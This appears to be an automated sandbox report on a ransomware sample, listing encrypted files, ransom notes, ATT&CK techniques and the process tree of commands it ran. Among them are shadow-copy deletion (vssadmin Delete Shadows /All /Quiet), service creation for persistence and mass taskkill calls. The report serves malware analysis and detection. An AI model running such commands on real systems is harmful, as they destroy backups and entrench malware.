File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\tipresx.dll.mui	Xinfecter.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\rtscom.dll.mui	Xinfecter.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\Restore_Your_Files.txt	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar_[[email protected]].3QC_Eg	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeFax.Dotx_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\nb.pak_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css_[[email protected]].3QC	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

Drops file in Windows directory 2 IoCs

Processes:

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

description	ioc	process
File created	C:\Windows\SysMain.sys	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
File opened for modification	C:\Windows\SysMain.sys	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe

Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2844 sc.exe
2916 sc.exe
2904 sc.exe
7628 sc.exe
7652 sc.exe
7724 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2844	sc.exe
2916	sc.exe
2904	sc.exe
7628	sc.exe
7652	sc.exe
7724	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 9 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3028 timeout.exe
7544 timeout.exe
13016 timeout.exe
816 timeout.exe
3356 timeout.exe
16712 timeout.exe
16284
6300 timeout.exe
5872 timeout.exe

pid	process
3028	timeout.exe
7544	timeout.exe
13016	timeout.exe
816	timeout.exe
3356	timeout.exe
16712	timeout.exe
16284
6300	timeout.exe
5872	timeout.exe

Enumerates processes with tasklist 1 TTPs 11 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
2540	tasklist.exe
1972	tasklist.exe
5232	tasklist.exe
2336	tasklist.exe
7928	tasklist.exe
2348	tasklist.exe
5596	tasklist.exe
16828	tasklist.exe
7328	tasklist.exe
7448	tasklist.exe
17192

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

2040 systeminfo.exe
1052 systeminfo.exe
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

1812 vssadmin.exe
2344 vssadmin.exe
7976 vssadmin.exe

pid	process
2040	systeminfo.exe
1052	systeminfo.exe

pid	process
1812	vssadmin.exe
2344	vssadmin.exe
7976	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
11064	taskkill.exe
1228	taskkill.exe
8440	taskkill.exe
824	taskkill.exe
8696	taskkill.exe
8744	taskkill.exe
8324	taskkill.exe
10912	taskkill.exe
10468	taskkill.exe
1744	taskkill.exe
1040	taskkill.exe
8488	taskkill.exe
8784	taskkill.exe
300	taskkill.exe
2804	taskkill.exe
1204	taskkill.exe
8296	taskkill.exe
10632	taskkill.exe
8860	taskkill.exe
676	taskkill.exe
2620	taskkill.exe
9012	taskkill.exe
8084	taskkill.exe
1604	taskkill.exe
8092	taskkill.exe
10708	taskkill.exe
8944	taskkill.exe
8816	taskkill.exe
872	taskkill.exe
2716	taskkill.exe
15624	taskkill.exe
8068	taskkill.exe
8132	taskkill.exe
8168	taskkill.exe
2156	taskkill.exe
1572	taskkill.exe
524	taskkill.exe
2996	taskkill.exe
7560	taskkill.exe
1776	taskkill.exe
1780	taskkill.exe
1828	taskkill.exe
828	taskkill.exe
2440	taskkill.exe
8404	taskkill.exe
9028	taskkill.exe
1088	taskkill.exe
2064	taskkill.exe
8036	taskkill.exe
10456	taskkill.exe
10668	taskkill.exe
2788	taskkill.exe
2724	taskkill.exe
2840	taskkill.exe
2152	taskkill.exe
1880	taskkill.exe
8884	taskkill.exe
5084	taskkill.exe
1904	taskkill.exe
1736	taskkill.exe
1616	taskkill.exe
17188	taskkill.exe
2556	taskkill.exe
2404	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2340 reg.exe
7944 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

300 schtasks.exe
7892 schtasks.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

2348 tasklist.exe
2348 tasklist.exe
2540 tasklist.exe
2540 tasklist.exe
7448 tasklist.exe
7448 tasklist.exe
7928 tasklist.exe
7928 tasklist.exe

pid	process
2340	reg.exe
7944	reg.exe

pid	process
300	schtasks.exe
7892	schtasks.exe

pid	process
2348	tasklist.exe
2348	tasklist.exe
2540	tasklist.exe
2540	tasklist.exe
7448	tasklist.exe
7448	tasklist.exe
7928	tasklist.exe
7928	tasklist.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exevssvc.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2348	tasklist.exe
Token: SeDebugPrivilege	2540	tasklist.exe
Token: SeBackupPrivilege	1672	vssvc.exe
Token: SeRestorePrivilege	1672	vssvc.exe
Token: SeAuditPrivilege	1672	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2204	WMIC.exe
Token: SeSecurityPrivilege	2204	WMIC.exe
Token: SeTakeOwnershipPrivilege	2204	WMIC.exe
Token: SeLoadDriverPrivilege	2204	WMIC.exe
Token: SeSystemProfilePrivilege	2204	WMIC.exe
Token: SeSystemtimePrivilege	2204	WMIC.exe
Token: SeProfSingleProcessPrivilege	2204	WMIC.exe
Token: SeIncBasePriorityPrivilege	2204	WMIC.exe
Token: SeCreatePagefilePrivilege	2204	WMIC.exe
Token: SeBackupPrivilege	2204	WMIC.exe
Token: SeRestorePrivilege	2204	WMIC.exe
Token: SeShutdownPrivilege	2204	WMIC.exe
Token: SeDebugPrivilege	2204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2204	WMIC.exe
Token: SeRemoteShutdownPrivilege	2204	WMIC.exe
Token: SeUndockPrivilege	2204	WMIC.exe
Token: SeManageVolumePrivilege	2204	WMIC.exe
Token: 33	2204	WMIC.exe
Token: 34	2204	WMIC.exe
Token: 35	2204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2204	WMIC.exe
Token: SeSecurityPrivilege	2204	WMIC.exe
Token: SeTakeOwnershipPrivilege	2204	WMIC.exe
Token: SeLoadDriverPrivilege	2204	WMIC.exe
Token: SeSystemProfilePrivilege	2204	WMIC.exe
Token: SeSystemtimePrivilege	2204	WMIC.exe
Token: SeProfSingleProcessPrivilege	2204	WMIC.exe
Token: SeIncBasePriorityPrivilege	2204	WMIC.exe
Token: SeCreatePagefilePrivilege	2204	WMIC.exe
Token: SeBackupPrivilege	2204	WMIC.exe
Token: SeRestorePrivilege	2204	WMIC.exe
Token: SeShutdownPrivilege	2204	WMIC.exe
Token: SeDebugPrivilege	2204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2204	WMIC.exe
Token: SeRemoteShutdownPrivilege	2204	WMIC.exe
Token: SeUndockPrivilege	2204	WMIC.exe
Token: SeManageVolumePrivilege	2204	WMIC.exe
Token: 33	2204	WMIC.exe
Token: 34	2204	WMIC.exe
Token: 35	2204	WMIC.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	2156	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	2556	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	2840	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.execmd.execmd.execmd.execmd.execmd.execmd.exeWScript.exe

description	pid	process	target process
PID 1968 wrote to memory of 1040	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1040	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1040	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1040	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1040 wrote to memory of 2348	1040	cmd.exe	tasklist.exe
PID 1040 wrote to memory of 2348	1040	cmd.exe	tasklist.exe
PID 1040 wrote to memory of 2348	1040	cmd.exe	tasklist.exe
PID 1040 wrote to memory of 2348	1040	cmd.exe	tasklist.exe
PID 1040 wrote to memory of 2720	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2720	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2720	1040	cmd.exe	findstr.exe
PID 1040 wrote to memory of 2720	1040	cmd.exe	findstr.exe
PID 1968 wrote to memory of 2840	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2840	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2840	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2840	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 2840 wrote to memory of 2844	2840	cmd.exe	sc.exe
PID 2840 wrote to memory of 2844	2840	cmd.exe	sc.exe
PID 2840 wrote to memory of 2844	2840	cmd.exe	sc.exe
PID 2840 wrote to memory of 2844	2840	cmd.exe	sc.exe
PID 1968 wrote to memory of 1788	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1788	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1788	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 1788	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1788 wrote to memory of 2916	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 2916	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 2916	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 2916	1788	cmd.exe	sc.exe
PID 1968 wrote to memory of 2728	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2728	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2728	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2728	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 2728 wrote to memory of 2904	2728	cmd.exe	sc.exe
PID 2728 wrote to memory of 2904	2728	cmd.exe	sc.exe
PID 2728 wrote to memory of 2904	2728	cmd.exe	sc.exe
PID 2728 wrote to memory of 2904	2728	cmd.exe	sc.exe
PID 1968 wrote to memory of 2636	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2636	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2636	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2636	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2168	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2168	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2168	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 2168	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 2168 wrote to memory of 1452	2168	cmd.exe	WScript.exe
PID 2168 wrote to memory of 1452	2168	cmd.exe	WScript.exe
PID 2168 wrote to memory of 1452	2168	cmd.exe	WScript.exe
PID 2168 wrote to memory of 1452	2168	cmd.exe	WScript.exe
PID 1968 wrote to memory of 556	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 556	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 556	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 1968 wrote to memory of 556	1968	995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe	cmd.exe
PID 556 wrote to memory of 300	556	cmd.exe	schtasks.exe
PID 556 wrote to memory of 300	556	cmd.exe	schtasks.exe
PID 556 wrote to memory of 300	556	cmd.exe	schtasks.exe
PID 556 wrote to memory of 300	556	cmd.exe	schtasks.exe
PID 1452 wrote to memory of 3040	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 3040	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 3040	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 3040	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 2052	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 2052	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 2052	1452	WScript.exe	cmd.exe
PID 1452 wrote to memory of 2052	1452	WScript.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe
"C:\Users\Admin\AppData\Local\Temp\995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /v /fo csv
    3⤵
    - Enumerates processes with tasklist
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- - C:\Windows\SysWOW64\findstr.exe
    findstr /i "dcdcf"
    3⤵
    PID:2720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
    3⤵
    - Launches sc.exe
    PID:2844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\SysWOW64\sc.exe
    sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:2636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1452
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\S-6748.bat" "
      4⤵
      Loads dropped DLL
      PID:2052
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v
        5⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
    - - C:\Windows\SysWOW64\find.exe
        
        find /I /c "dcdcf"
        5⤵
        
        PID:2804
    - - C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:1812
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:816
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:1972
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:1572
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:3356
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:5232
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:5308
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:3028
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:5596
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:5680
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:6300
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:16828
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:16860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:5872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 90 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:16712
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:2336
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:7176
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
        5⤵
        Deletes itself
        Drops startup file
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3160
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
        6⤵
        
        PID:7396
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v /fo csv
        7⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        
        PID:7448
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /i "dcdcf"
        7⤵
        
        PID:7404
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /PID 2052" /f
        6⤵
        
        PID:7596
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /PID 2052" /f
        7⤵
        Kills process with taskkill
        
        PID:7560
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        6⤵
        
        PID:2284
        
